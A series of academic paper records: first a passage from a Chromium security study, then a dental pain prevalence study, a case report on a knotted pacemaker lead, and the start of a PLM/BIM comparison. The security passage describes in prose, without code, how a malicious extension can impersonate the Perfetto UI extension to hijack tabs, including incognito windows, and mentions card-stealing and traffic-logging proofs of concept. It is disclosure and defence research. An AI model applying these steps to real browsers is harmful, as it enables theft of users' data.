Attack vector. For reasons similar to those discussed for the Screen Reader extension (See §4.4), there is another special extension that is granted a privileged status with more capabilities, including the ability to attach to the browser target using the Debugger API: the Perfetto UI extension [40]. This is an official development tool from Google that interacts with a web app [33] to profile, record, and view Chromium execution traces. To obtain these traces, the Perfetto UI extension uses commands from the Tracing CDP domain, which are not accessible outside the browser target. Unlike the running on WebUI tabs and on other extensions attacks, there is no flag to replicate this backdoor access. As so, it can only be exploited by sideloading a clone extension that impersonates the Perfetto UI extension following the steps we introduced in §4.4. This is hardcoded in the Chromium source code and allows the Perfetto UI extension to attach to the browser target by specifying the undocumented "browser" target ID, as shown in Listing 6 and Listing 7.
The browser target that the Perfetto UI extension can attach to is not as powerful as the actual browser target because some domains and commands are inaccessible (e.g., the Network domain is missing from this CDP host). Nevertheless, this tool still has access to more domains than it seems to need to deliver its functionality, which goes against the principle of least privilege. One of these domains is the Target domain, which from here is not capable of communicating with other targets because the Target.sendMessageToTarget command does not deliver CDP messages to to their destination. Another functionality that does not work is the flattened access [50] -an improved mode of operation intended to deprecate the former command-as the sessionId property that needs to be added to CDP messages for this mode to work cannot be sent using the Debugger API. However, these limitations can be bypassed to send commands to any arbitrary target as follows: 1) Attach to the browser target using the Debugger API. 2) Create a proxy target (a tab with an about:blank URL will do) and attach to it using the Debugger API like in the previous step.
3) Send the
Target. exposeDevToolsProtocol command to the browser target to expose a pair of JavaScript bindings in the proxy target. Then, they will be used to communicate with the desired arbitrary target through a different communication channel that will allow sending CDP messages with the sessionId property. 4) Use the window.cdp object from the proxy target to attach to the desired final target (e.g., a WebUI tab or an extension background page) and start sending commands to it through the proxy.
Impact. By impersonating the Perfetto UI extension, an attacker can abuse the CDP browser target to gain all capabilities from the previous attacks combined. In practice, this means an extension can hijack any regular tab, WebUI page or extension belonging to any browser context, including incognito windows. We include two different artifacts to exemplify this attack and its impact. The first one is another credit card stealer similar to the one we made for §4.4. However, this sample uses the Debugger API and the browser target to attach to chrome://settings/payments. The second sample is a browser-wide traffic monitor that logs all requests and responses from any opened tab or running extension, including incognito windows and WebUI tabs (see Listing 8 for a simplified code snippet).
Discussion
In this section, we discuss the impact of our attacks, our concerns with the current Chromium extensions architecture, and the effectiveness of the solutions already implemented or proposed by the Chromium Development Team.
Impact
The attacks presented in this paper allow a malicious extension to abuse flaws in the Debugger API to steal sensitive user information and manipulate runtime behavior (Table 2), all while violating basic security requirements such as isolation or access control (Table 3). In addition, since most of the Chromium UI is implemented using WebUI pages ( §4.4), an attacker is also able to change browser settings or even experimental flags. We have also shown how the Debugger API can be misused to modify site permissions ( §4.2) or bypass security interstitials without any user awareness or intervention ( §4.3).
Our attacks can have a high impact due to the privileged capabilities an attacker can acquire, but also because they are rooted in core components of the Chromium Project, which is critical in today's web browser market. According to Statcounters [72], Google Chrome has a 60% of market share and it is present in popular forks such as Microsoft Edge, Brave browser, and Opera among others. Furthermore, three of our attacks ( §4.4, §4.5, §4.6) are in part the result of a questionable approach to integrate two officially-branded Google extensions with Chromium. This approach consists on hardcoding the IDs of such extensions into the browser's source code, thus widening the impact of the attacks by propagating these changes in Chromium forks as well. Other Chromiumbased products may inherit this artifact and its associated risks, even if said extensions are not intended to run in them. This might be a even larger problem for products with a more permissive extension origin policy since they might not be aware of this threat vector.
Root causes
The attacks proposed in our work are possible due to a combination of factors that have shaped core components of the Chromium project and its development. We now discuss these enablers.
Design flaws. The attacks described in this paper do not exploit flaws in the implementation of a specification (e.g., memory corruption issues). Instead, they originate from design decisions where the risk-benefit trade-off may not be well balanced. One clear example is the attack described in §4.3. Attaching to security interstitials using the Debugger API was not possible until Chromium 70 when this capability was intentionally granted [42] to prevent the Lighthouse extension-an official Google development tool-from detaching when running tests on a web application without offline support [62]. While the implementation of this change did not introduce any bugs per se, the design decision behind it is, at a minimum, questionable because security interstitials are triggered after a critical event that requires user consent.
The backdoor accesses used in §4.4, §4.5 and §4.6 suggest design choices that were not sufficiently evaluated from a security standpoint. These privileges were implemented in such a way that they blindly trust the ID of an extension without verifying its signature. In the case of the Screen Reader extension, even the Chromium developer who introduced the change in October 2011 explicitly acknowledged that this solution is "temporary" and that a long-term alternative is needed [53]. However, as of the writing of this paper, this temporary code written 11 years ago has not yet been superseded nor there is any indication that it will be.
As for the Perfetto UI extension, the change was introduced in January 2020 [46] to let https://ui.perfetto.dev get traces from all tabs or renderers through this extension. Unfortunately, more CDP domains apart from Tracing were exposed when allowing attaching to a limited instance of the browser target. It is evident that this decision was not deeply thought-out and that extensions are not expected to attach to the browser target given the convoluted workaround we had to come up with for §4.6.
Lack of specifications. While the Chromium Project has public Design Documents for most of its components [15], we could not find the specification for some extension APIs, including the Debugger API. This makes it challenging to independently determine whether a particular browser behavior is a feature or a bug. Thus, we were unsure whether listing and attaching to targets from incognito windows ( §4.1, §4.2) was intended or not until April 2022 when we got confirmation from the Chrome Development Team that it was certainly not intended. Another example is the extensions-on-chrome-urls flag used in both §4.4 and §4.5. While it allows extensions to run on "chrome://" URLs, it also grants the Debugger API access to the "chrome-extension://" scheme. We could not find this behavior documented anywhere. Once again, we are unsure whether this is intentional or not as the name of the flag does not suggest it will also apply to browser extensions. To make matters worse, to this date we still do not know why the flag was introduced in the first place as the associated Chromium issue 11 has not yet been made public.
Overpowered APIs. Extensions can control almost every single aspect of the browser through the use of extension APIs. As we demonstrate in this paper, the Debugger API is one of the more powerful ones, if not the most. Some CDP commands can even break basic browser isolation mechanisms ( §4.2). This allows accessing or modifying any cookie stored in the browser without the user being clearly aware of the capabilities of the extension. Additionally, we have shown how targets from incognito windows are not isolated either as the Debugger API can list and attach to them even when the extension has not been granted explicit permission.
Despite the Debugger API being a highly privileged and potentially dangerous capability, the associated risk is not reflected accordingly. We found all of our attacks violate SR01: when installing an extension that declares the debugger permission, the install prompt merely shows a vague warning informing the user that the extension will have access to the "page debugger backend" (Figure 6). We find this risk communication strategy very inadequate. Other platforms have dealt with apps that abuse powerful permissions in the past. In the case of Android, this was partially addressed by mandatorily locking certain resources behind runtime permissions [4]. Although Chromium extensions have a similar concept called "optional permissions," it is up to the developers to use them or keep requesting a permission at installtime [25].
Another issue with the Debugger API is that users have little control over which targets an extension is allowed to debug. As mentioned in §4.2, users can force a debugging extension to detach from all targets by closing an infobar ( §2.3). Nevertheless, extensions can reattach immediately after. Even if the user becomes aware of this deceptive behavior, there is little they can do to prevent it besides uninstalling the malicious extension. This situation turns the notification infobar into a merely informative mechanism that can be easily defeated by an effectively overpowered extension.
Solutions
We reported all of our findings to Google. The issue related to the attack from §4.1 was flagged as a duplicate of a similar report 12 by another researcher in August 2021, which stayed stale for months until we submitted our own report. We did not know this at the time of reporting. Both this bug and the one we present in §4.3 have already been addressed and fixed by adding appropriate security controls. The different vulnerabilities that enable the attacks from §4.4, §4.5 and part of §4.6 were merged into 11. See https://crbug.com/174183. 12. See https://crbug.com/1236325. The other bug 14 that we reported in relation to §4.6 was initially considered a security vulnerability but then flagged as "not-a-security-bug," consequently making it public. While the issue remains open and at some point there was some discussion around preventing sideloaded extensions from attaching to the browser target, no progress has been made since.
Regardless of whether our attacks exploit actual bugs or intended features, it is evident that the Debugger API provides extensions with a wide range of powerful capabilities, and that such privileged capabilities require extensive and effective security controls. At some point during the vulnerability disclosure process, members of the Chromium Team proposed restricting the Debugger API in its entirety to users with developer mode enabled. This was later deemed not ideal as it would impact legitimate developers. Instead, one strategy we propose for risk reduction would be to follow the principle of least privilege and redesign a finer grained permission system for the Debugger API. Examples of this idea abound in other platforms, including the Linux capabilities introduced in the kernel starting with version 2.2 [49], or the splitting of the location permission in Android into more than one for different purposes. In the case of the Debugger API, having a separate permission for each CDP domain will greatly improve security and reduce the impact of abusive extensions. In fact, this is explicitly advised in the CRX API Security Checklist from the Chromium Security Team [13].
The security principle of Separation of Privilege (i.e., granting access based on meeting multiple independent conditions) can also contribute to risk reduction. Two easy-to-implement additional security checks that can be tested when an extension intends to access the Debugger API are: • "Trusted" v. "non-trusted" extensions. Chromium already can detect the origin of an extension (e.g., Chrome Web Store, sideloaded). The browser could use this information to restrict certain manifest permissions to "trusted" extensions that are signed or coming from a verified distribution platform. 13. Reported in https://crbug.com/1276497. 14. Reported in https://crbug.com/1301966. • Asking for user consent at runtime. Instead of just showing a merely informative infobar ( §2.3), we suggest replacing it with a consent dialog asking the user to grant or deny extension attachment requests. A similar approach to put sensitive APIs behind a user gesture permission or a security warning was proposed by a member of the Chromium Development Team.
Regarding the Screen Reader and Perfetto UI extensions, hardcoding the identifier of a privileged subject is not a robust security mechanism and opens backdoors. Perhaps the safest option would be to convert them to internal Chromium components. In doing so, the extra capabilities needed exclusively by these two extensions could be packaged into private extension APIs accessible to them instead of granting access based on a hardcoded credential.
To discern whether potential issues are actual intended features and to ease their assessment, we suggest including the corresponding technical specification alongside code changes. This would facilitate to publicly audit code changes to make sure they comply with the specification. Additionally, having a link between the design and the implementation makes Design Documents easier to find.
Related work
Detecting harmful extensions. Previous research on the web extensions ecosystem has focused on detecting malicious browser extensions (MBE). DeKoven et al. describe a methodology for identifying users visiting Facebook that had MBEs installed in their browser [20], which builds upon the work of Kapravelos et al. in Hulk [45]. Based on it, they were able to label close to 2k malicious Chromium and Firefox extensions and notify their users. Pantelaios et al. used a sample of almost 1M different extension releases to propose a system for detecting malicious updates [60]. Saini et al. introduce attacks where colluding extension share and access sensitive information without being noticed [67]. Similarly, other works focus instead on extensions intentionally leaking personal data. Chen and Kapravelos developed an automated taintanalysis framework and found that almost 4k of extensions downloaded from the Chrome Web Store leaked privacysensitive information [11]. Weissbacher et al. propose Ex-Ray, a technique for dynamically detecting browsing history leaks through traffic analysis [78].
Detecting vulnerable extensions. Prior studies looked for browser extensions with bugs that can be exploited by web pages or another extension. Bandhakavi et al. used static analysis to automatically flag potentially vulnerable code in legacy Firefox extensions [6]. Fass et al. improved on this with DOUBLEX, a classifier that managed to accurately detect known flaws on a labeled vulnerable extension dataset [23].
Listing running extensions. Sanchez-Rola et al. used timing side-channel attacks to abuse flaws in the implementation of access control settings in multiple browsers that support extensions [68]. Laperdrix et al. looked at CSS modifications injected into web pages by extensions to fingerprint the set of extensions running in a browser [47]. Starov and Nikiforakis proposed a similar technique in XHOUND, an automated framework to measures changes in the DOM for the same purpose [71].
Analysis of the browser extensions architecture. All the previously mentioned works showcase how powerful extensions are. However, they mainly focus on identifying abusive or abusable extensions, not on discussing the browser extension architecture that enables their behavior. Reeder et al. performed a user study on warning messages displayed by the browser [66]. They found that, while warning design has come a long way, there is still room for improvement as the context of a warning largely influences the resulting outcome.
Conclusions
In this work we presented several attacks that exploit vulnerabilities in the Chromium Debugger API. Our attacks allow a malicious extension to take full control of the browser, access sensitive information, impersonate other extensions, and exploit restricted features not intended to be used by any extension. We demonstrated some of these actions through several PoCs that we made publicly available. Our attacks affect every major Chromium-based browser. We reported our findings to Google, which already fixed some of the vulnerabilities and is addressing the rest at the time of this writing.
Even though inadequate security checks are enablers for some of our attacks, we believe that the Debugger API grants extensions excessive capabilities through just one permission, and that the granting mechanism does not fully convey the risk to the user. We have provided constructive discussion on the root cause for most of these vulnerabilities and potential strategies to improve the security of the Debugger API. | 2023-05-22T01:15:41.079Z | 2023-05-19T00:00:00.000 | {
"year": 2023,
"sha1": "637950611c48282d99d84cb5df47d54e467491b4",
"oa_license": null,
"oa_url": null,
"oa_status": null,
"pdf_src": "Arxiv",
"pdf_hash": "7cb2ffaee9093b67ba269225fb3cbfa83a2572b3",
"s2fieldsofstudy": [
"Computer Science"
],
"extfieldsofstudy": [
"Computer Science"
]
} |
53483066 | pes2o/s2orc | v3-fos-license | Referred Dental Pain , an Analysis of their Prevalence and Clinical Implication
The study objective was to evaluate the prevalence of referred dental pain (RDP) in a group of Brazilians subjects and identify possible partnerships with sex, age and the presence of periodontal or periapical lesions. A descriptive cross-sectional study was designed, 98 patients between 14 and 64 years old (59 women and 39 men), who consulted by dental pain were evaluated clinically and radiographically in order to determine the cause and partnership with periapical and periodontal lesions and its possible territories projection other than their origin. The prevalence of RDP was 31.6%, higher in women (67.74%) though without statistical significance. The RDP was presented at a 45.16% together with periapical lesion and a 25.8% along with periodontal lesion. There was no relationship between age and RDP presence. The high prevalence of RDP found reinforces the need for a diagnosis of orofacial pain.
INTRODUCTION
The pain in the oral and maxillofacial territory has a great impact on the quality of life (Murray et al., 1996), its management requires a etiological diagnosis, which is not always easy, because the Painful conditions in this region, particularly for teeth, tends to be poorly located by the patient.In the trigeminal system high convergence at the spinal trigeminal nucleus of the trigeminal and cervical primary afferents neurons, originating in the pulp, periodontal, oral mucosa, tegument, muscles and joints, has been implicated in the mechanism of referred pain (Sessle et al., 1986;Piovesan et al., 2001;Alburquerque et al., 2008;Dias et al., 2009).
For this reason referred Painful conditions of the teeth may have originated in distant territories as the ear, muscles of occipital region, masticatory muscle or in other teeth (Silverglade, 1980;Zeng, 1980;Capuano et al., 1984;Sulfaro & Gobetti, 1995;Wright, 2000;Abu-Bakra & Jones, 2001).That is why the description that makes the patient about the location of pain should be taken with caution; it is recommended that to reach a proper diagnosis, in addition to anamnesis, the clinician should use tests that include a pulp vitality test and radiographs (Ehrmann, 2002).
Through clinical studies found that pain intensity presents a great partnership in the development of referred pain of dental origin, unlike what happens with the duration or quality of pain, linking this aspect with mechanisms of hyperexcitability due to central sensitization (Falace et al., 1996).That is why in acute painful conditions of dental origin, high-intensity pain, is most likely development processes of referred pain, which has great clinical implications.
Due to the shortage of studies to analyze the prevalence of referred dental pain and the populationspecific differences in some events associated with pain (Riley & Gilbert 2000;Riley et al., 2002).The purpose of this study was to examine the prevalence of this event in a group of Brazilians subjects and determine possible associations with sex, age and the presence of periodontal or periapical lesions.
MATERIAL AND METHOD
This study was carried out at the Emergency Clinic of the Faculty of Dentistry at the Universidad de São Paulo.We performed a cross-sectional study, which examined the prevalence of referred pain from a tooth.The patients were incident cases who consulted for emergency dental pain between March and July 2008, as an inclusion criterion was seen as being more than 14 years old and were excluded from this study seriously ill patients, with physical, cognitive or psychological limitations which hinder the collection of data.The patients were informed of the nature of the study and agreed to voluntarily participate in it, signing a written consent to do so.This research included the adoption of the ethics committee on research at the University of São Paulo.
Patients.The sample consisted of 98 patients, between 14 and 64 years old (average 34.38; SD 12.77), of who 59 were women, with an average age of 33.28 years (SD 13.14) and 39 men whose average age was 36.05 years (SD 12.17).
Evaluation.In order to determine the tooth that caused pain, patients were assessed clinical and semiology using diagnostic tests series, which included visual inspection, palpation, percussion, sensitivity test (electricity, heat and cold).
This evaluation was supplemented by radiographic examination in which it was determined the presence of periapical and periodontal lesions associated with tooth considered the cause of pain.
Referred dental pain.
Once the tooth that caused painful condition was determined, were explored through history and clinical examination the presence of referred dental pain.It was considered referred dental pain to one that is projected to a tooth, or a group of teeth, other than that which is considered etiological for the development of painful condition.
Analysis.Through the program SPSS 15.0 established the prevalence of referred dental pain.Using contingency tables analyzed the association of this condition with sex, the presence of periapical and periodontal lesions, determined probabilities of Clinical Importance, the significance was analyzed by means of the non parametric Chi Square test (p <0.05).The significance of differences in relation to the age of the patients with and without referring dental pain were performed using the Student's t-test (p <0.05).
RESULTS
Of the 98 patients, 31 showed referred dental pain calculated for this sample a prevalence of 31.6%, of which 14 indicated that the pain was projected to the entire dental arcade (14.3%) and 17 who did it to a tooth in particular (17.3 %).
Referred pain dental and sex.In the group that submitted referred dental pain, to analyze the distribution by sex is noted that it was presented in 21 women and 10 men, however, the statistical analysis, this difference was not significant (chi-square = 0.3).We performed the calculation of probabilities for this sample and was obtained that the probability that a patient referred dental pain is this woman is 67.74% (Table I).
Referred dental pain and periapical lesion.Periapicals lesions evaluated radiographically, were found in 39 of total patients studied (39.79%).Of these, 14 had referred pain, which corresponds to 14.2% of total and 35.89% of those with lesion.In the group that submitted referred dental pain, to analyze the distribution according to the presence or absence of periapical lesions shows that it was more common in subjects with no periapical lesions, these differences were not significant (chi-square = 0.46), therefore, no association was found between the presence of periapical lesion and presence of referred dental pain.
We performed the calculation of probabilities for the sample and found that the probability of a patient who referred dental pain was periapical lesion is 45.16%.
Referred Dental Pain and Periodontal lesions.By radiographic evaluation were found 17 subjects with periodontal lesion, which corresponds to 17.3% of the total analyzed, of which 8 (47%) were presented in conjunction with referred dental pain.Differences between the presence or absence of periodontal lesion in the group that submitted referred dental pain was not significant (chi-square = 0.132).II) we note that the probability of a patient in the sample that this referred dental pain and periodontal lesion related is 25.8%.
Referred dental pain and age.
The group presented referred dental pain had an average age of 33.48 years (SD 10.96), while the average age in the group not planned to another site pain was 34.8 years (SD 13.59).
The differences between these groups were not statistically significant (p = 0.63).
In this study, we found a high prevalence of referred dental pain, approximately one in three patients who consulted (31.6%), from the site of pain origin, assessed through various diagnostic procedures, it was projected to other territorios.In all these cases the attention to the description made by the patient generate wrong diagnoses and inappropriate treatments (Ehrmann).The absence of a gold standard that allows diagnoses and compare referred dental pain difficult the standardization of clinical evaluation procedures, it should be implemented, especially in cases where the pain intensity is high (Falace et al.).
The highest prevalence of referred dental pain is in women, this is consistent with some studies indicating that women have a higher prevalence in some painful facial conditions (Dannecker et al., 2008), but reported pain in an inappropriate manner, hindering their terapeutic management (Donovan et al., 2008), joined some modulation mechanisms of pain differ between men and women (Quiton & Greenspan, 2007), possibly linked to estrogen receptors in the spinal trigeminal nucleus, this has been recently questioned by some authors who have found no relationship between the menstrual cycle and use of contraceptives with the sensitivity associated with dental and myofascial pain (Tófoli et al., 2007 ;Vignolo et al., 2008).
The probability, in our sample, of finding referred pain in pulp and periapical lesion was greater than the probability that it is given in conjunction with an periodontal lesion, which is interesting to analyze in neurophysiological terms, this may be related to three points: first, the differences in dental and periodontal somatotopy in pain perception; secon, due to the increased probability of awareness system in case of periapical lesion, because this resulted in an prior pulp injury; third, due to the presence of propioceptors in the periodontal tissues, which contribute to improving the location of the tooth affected by a periodontal lesion.
DISCUSSION
Pain of odontogenic origin is semiologically relevant, because some aspects of the morphological components were very complex.First, the high convergence of primary afferent neurons of the trigeminal nerve, which, from various territories, are projected to spinal trigeminal nucleus neurons (Sessle et al.) Second, by the presence of other nerves, such as facial, glosopharingeal, vague nerves and the first cervical nerves, which have have cutaneous, mucous or deep territory, projecting some of its primary afferent to the spinal trigeminal nucleus (Bowsher, 1979;Myers, 2008).Third, because the involvement of neuromodulation of intercellular diffusion to spinal nucleus level, as NO2, associated with NMDA glutamatergic receptors activity, thus facilitating the emergence of hyperalgesia and extent of the sensitive fields involved in the location of pain.Fourth, due to poor somatotopy that having some structures innervated by the trigeminal system, which complicates the exact location of the origin of pain (Bowsher).All these factors make the irradiated and referred pain condition frequently observed in clinical practice.
Table I .
Contingency table related the presence or absence of referred dental pain to the sex of the patient.Calculated based on 98 patients who consulted pain in the dental clinic at the Faculty of Dentistry at the Universidad de São Paulo, Brazil.TableII.Contingency table related the presence or absence of referred dental pain to the presence of periapical lesion or periodontal lesion, based on the radiographic evaluation of 98 patients who consulted pain in the dental clinic at the Faculty of Dentistry at the Universidad de São Paulo, Brazil. | 2018-10-30T13:16:14.503Z | 2012-08-01T00:00:00.000 | {
"year": 2012,
"sha1": "e38015e53c5d680d7669adc5c96d2caa7a4960a0",
"oa_license": "CCBYNC",
"oa_url": "http://www.scielo.cl/pdf/ijodontos/v6n2/art09.pdf",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "e38015e53c5d680d7669adc5c96d2caa7a4960a0",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
255362494 | pes2o/s2orc | v3-fos-license | Untying the Knot: A Rare Case of Formation of a Life-Threatening Intracardiac Knot Following the Placement of a Temporary Transvenous Pacemaker
The implantation of a temporary pacemaker lead is a very common procedure performed in most hospitals and is known to be relatively safe, but there can be serious complications in rare circumstances. Reported complications including arrhythmias, infection, thromboembolic phenomena, and perforation of the vessel or the heart are all extensively described. However, an unusual and life-threatening complication that is not frequently discussed is the formation of intracardiac knots. We present a case of a rare complication of a temporary pacemaker placement with the formation of a knot in the distal lead requiring expert technique for removal.
Introduction
Since the invention of temporary transvenous pacemakers (tTPM), their use for the acute management of bradyarrhythmia has been on the rise. Although useful in the medical management of arrhythmias, it had been plagued with multiple complications that include arrhythmias, infection, thromboembolic phenomena, and perforation of the vessel or the heart [1]. However, distal lead knotting following the placement of a tTPM has not been extensively described. Intracardiac knotting could lead to vascular or valvular injury, pneumothorax, symptomatic loss of pacing or hemodynamic compromise, and difficult lead removal [2].
We present the case of a 59-year-old female with bradyarrhythmia with loss of pacing following the tTPM placement who was found to have an unusual knot formed at the distal part of the lead. This case highlights an unusual and potentially life-threatening complication of the tTPM placement.
Case Presentation
A 59-year-old female presented to the emergency department after a fall from a standing height. She had a past medical history of end-stage renal disease that required hemodialysis for three years as well as paroxysmal atrial fibrillation, which was treated with Flecainide and Eliquis. Her last echocardiogram showed a moderately dilated left atrium with a normal ejection fraction. She also had a history of deep venous thrombosis as well as nonobstructive coronary artery disease. The trauma workup was negative. She did not lose consciousness or sustain any injuries. She had missed dialysis the day prior. Initial vitals showed a blood pressure of 76/36 mmHg with a heart rate of 31 bpm. Electrocardiogram revealed a junctional rhythm. Laboratory abnormalities revealed a potassium of 6.6. Preparation for urgent dialysis was made, and cardiology was consulted. However, the patient's heart rate did not improve due to a junctional rhythm with a concern for a high-grade AV block ( Figure 1).
FIGURE 1: Electrocardiogram showing the junctional rhythm
A right internal jugular vein transvenous pacemaker was placed. Post-procedure chest x-ray revealed a temporary venous pacer tip overlying the right ventricle with redundancy at the tip ( Figure 2). Initial capture was appropriate but was shortly lost, and the temporary wire was retracted and planned to be replaced; however, there was resistance upon removal. Vascular surgery was consulted, and a buddy guidewire was placed through the sheath with the removal of the sheath for protection of access; subsequently, the transvenous pacing wire was manipulated and removed revealing a knot in the distal tip. The patient's rhythm subsequently improved after consecutive dialysis sessions, and she was discharged from the hospital to a skilled nursing facility.
FIGURE 2: A chest radiograph with an arrow showing a distal knot in the pacemaker lead
The image shows an anteroposterior radiograph with a left subclavian vas-cath. The right internal jugular temporary transcutaneous pacemaker with a distal knot is highlighted by the blue arrow.
Discussion
In the late 19th century, the initial descriptions of a pulsed electrical stimulation to the heart were first postulated by J. A. McWilliam. He described the pacing of the ventricles using a flexible wire electrode. The continuous evolution in the technology led to the first pacemaker device built by an American scientist named Albert Hyman in 1932. In the late 1950s, two scientists named Seymour Furman and John Schwedel were able to innovate a novel technique whereby endocardial stimulation was provided through a lead inserted via the internal jugular vein [3]. Since its innovation, temporary pacing has become a commonly performed procedure in most hospitals, with indications for its use well established by governing National Cardiology Colleges [4].
Pacemakers work by electrically stimulating the myocardium, thereby increasing the heart rate in bradyarrhythmia, or, in some special cases, it is used to prevent or treat tachyarrhythmias as seen in circuit entraining in atrial flutter and ventricular tachycardia. Temporary pacing is usually preferred in an acute situation due to its ease of placement and availability [3]. In pathologies where there is a temporary disruption in the electrical conduction of the heart, tTPM serves as a bridge to a permanent device. However, it should be known that the time of recovery could be lengthy in certain neuromuscular conditions, thereby leading to a prolonged duration of device placement [5].
Numerous complications associated with its placement have been described in the literature; they have been generally classified as (1) complications in establishing access, (2) complications of the catheterization procedure, and (3) complications of the catheter residence [6,7]. In a study conducted in 1983 with 1022 patients, there were no reported deaths, and the study reported a complication rate of only 13.7% with the pericardial rub being the most frequent (5.3%). In contrast, a study performed by Murphy involving 194 patients showed staggering life-threatening complications in 68 patients (35%) and an unusually high number of deaths in 55 patients, which accounted for 28% of the study population [7]. This high rate of complications and death was likely attributed to poor techniques and also the performance of the procedure by poorly skilled personnel [4].
According to the literature, the formation of an intracardiac knot has been widely attributed to poor technique usually as a result of operator inexperience [7] and the increased flexibility of the pacemaker lead.
Although the flexibility of the lead is considered to be advantageous in the insertion of the pacemaker, it has been shown to be hazardous since its redundant lead may form into loops [1]. The use of guide wires is usually the first line and preferred technique when an intracardiac knot occurs; this technique is performed by gradually advancing the guidewire into the catheter until the knot is untied. However, this technique has its limitations as its success is dependent on the looseness of the knot. If the intracardiac knot is not loose enough and/or is located a long distance away from the tip of the catheter, it is usually unsuccessful. Another method that has been described involves traction and removal of the catheter through the puncture site. This technique requires both internal jugular and subclavian veins access, thereby increasing the risk for major local complications. Safer techniques involving combined radiological-percutaneous techniques of extraction have been described, especially if the above-mentioned technique for the untying of the knotted catheter fails. The commonly used percutaneous removal method requires the replacement of the original sheath used for catheter insertion by an introducer of a larger diameter close to that of the knot [8].
Another method, though not widely used, is to untie the knot by holding its distal end with a snare and tugging it back and forth while simultaneously holding its proximal end [9]. Basket retrieval and the use of endomyocardial biopsy forceps are two other methods described [6,9]. If the knot becomes fixated to the myocardium, is too large in size, or has multiple loops, then surgical removal is usually recommended for safer retrieval.
As with the complication discussed in this case report, this complication is easily prevented when the catheter or pacemaker is placed under fluoroscopic guidance. This allows the operator to ensure that a great length of the catheter is not introduced into the cardiac chamber, thus preventing the catheter from doubling on itself and forming a knot [1].
Conclusions
Although the placement of tTPM is generally considered a safe procedure, knotting of the lead tip as shown in this case should be anticipated, especially following the loss of capture after the placement of a TPM. This can be easily prevented by ensuring that the length of the electrode introduced into the cardiac chamber is not too long, thereby preventing a loop formation and potential knot formation.
Additional Information Disclosures
Human subjects: Consent was obtained or waived by all participants in this study. Conflicts of interest: In compliance with the ICMJE uniform disclosure form, all authors declare the following: Payment/services info: All authors have declared that no financial support was received from any organization for the submitted work. Financial relationships: All authors have declared that they have no financial relationships at present or within the previous three years with any organizations that might have an | 2023-01-02T16:06:09.483Z | 2022-12-01T00:00:00.000 | {
"year": 2022,
"sha1": "20f842f8ecc7cb6d88b74ae12a660d50c5548934",
"oa_license": "CCBY",
"oa_url": "https://www.cureus.com/articles/130482-untying-the-knot-a-rare-case-of-formation-of-a-life-threatening-intracardiac-knot-following-the-placement-of-a-temporary-transvenous-pacemaker.pdf",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "925345dda83d43a2c705bd4e780698761d089459",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": []
} |
39603081 | pes2o/s2orc | v3-fos-license | Similar Concepts, Distinct Solutions, Common Problems: Learning from PLM and BIM Deployment
. This paper describes the similarities and differences between Product Lifecycle Management and Building Information Modelling concepts, focusing on integration issues relative to their methods, information systems, effects and criticisms. In this literature based discussion, the authors show that the two concepts share fundamental similarities but are distinct in their scope and level of integration as well as maturity of process and workflow management. The paper highlights several common problems and aims to provide guidance for deployment initiatives.
Introduction
A variety of lifecycle management concepts enabled by advances in business process integration and information technology (IT) have been developed in various sectors. In manufacturing sectors, Product Lifecycle Management (PLM) has evolved to provide platforms for the creation, organization, and dissemination of product-related knowledge across the extended enterprise [1]. In the construction sector, a renewed focus on lifecycle processes is emerging within the BIM (building information modelling) paradigm, an object oriented approach to creating, managing and using construction project data. Whilst both are relatively new concepts, PLM stands as a more established approach, seeing steady uptake since the mid-1990s. BIM has only recently become the accepted term for the production and management of a built asset's information throughout design, construction and operations [2]. Recently comparisons have begun to relate PLM and BIM concepts, contrasting the functionalities and capabilities of their methods and systems, see [3,4,5]. These studies are beginning to examine their similarities and differences; however a number of open questions remain relative not only to their concepts, methods, and systems but also their intended effects and criticisms. In reviewing the literature, the authors present a comparative analysis that explores these questions to provide a broader account of PLM and BIM relative to the unique structural characteristics of each sector. The remainder of the paper is divided into four sections. Sections 2 and 3 review PLM and BIM concepts, information systems, effects and criticisms. Section 4 compares and discusses their main attributes and shared problems, before closing the paper with a discussion and summary of research contribution.
2
Product Lifecycle Management Stark [6] broadly describes PLM as simply the activity of managing products effectively across their lifecycle. Understanding the evolution of PLM is helpful to expounding Stark's definition. Emerging from product data management (PDM), which provides data management capabilities [7,8] PLM extends beyond the engineering aspects of a product to provide a shared platform for the creation, organization, and dissemination of all product-related knowledge across the extended enterprise [1]. PLM is thus a strategic business approach to the collaborative creation, management and exchange of product lifecycle information [9].
Concept and Methods
The general idea behind PLM is to serve up-to-date data, information and knowledge in a secure way to all people who are part of the product lifecycle [10]. Information is produced by a variety of participants at different levels of detail in diverse functions inside and outside a firm [11]. Complexity increases when moving from data towards knowledge, with data and information easier to store, describe, and manipulate [1].
The range of data, information and knowledge across an extended enterprise must be integrated correctly throughout the lifecycle. Various methods, systems and engineering tools are required to organize, store, access, convert and exchange these different forms correctly and seamlessly. Consequently generating appropriate data, information, and knowledge structures is critical [8]. IT infrastructure is therefore central to PLM, including hardware, software, and Internet technologies, and underlying representation and computing languages. In manufacturing industries, the product lifecycle is typically divided into three distinct phases: beginning/middle/end of life (BOL/MOL/EOL). PLM transverses these phases and assists a corporation and its extended enterprise in meeting functional-and data-level requirements [12]. Together numerous methods, systems and engineering tools form the systems architecture of a PLM solution. Currently, these are mostly deployed in the BOL phase to support design and development. However the application of IT in MOL and EOL phases is increasing as customer needs and technologies mature [10]. PLM functionality is achieved via 'system components', including the IT Infrastructure as well as a Product Information Modelling Architecture (PIMA), a Development Toolkit, and a set of Business Applications [11]. PIMA includes product ontology and interoperability standards. A development toolkit provides the means for building Business Applications and extends PLM functions to include kernels (e.g. geometry), visualization tools, data exchange standards and mechanisms, and databases. Business applications provide PLM functionalities to process corporate intellectual capital [11]. There are different types of functional-and data-level requirements of PLM system architectures. According to Jun [12], the functional-level requirements of PLM are defined by the large amounts of structured and unstructured data that are created, updated, transferred, removed, reused and stored in several application systems across the extended enterprise. The requirements for handling this include: real-time data acquisition, closed-loop information flow, interoperability between devices and application systems, integration with existing systems and services and the collaborative environment [12]. Data-level requirements relate to product and product-related data (e.g., business, maintenance and expiration data). For seamless interface between product and product-related data requirements surround the use of standardized data, data interoperability, product information traceability, data encryption, and user authentication [12].
Information Systems and Technologies
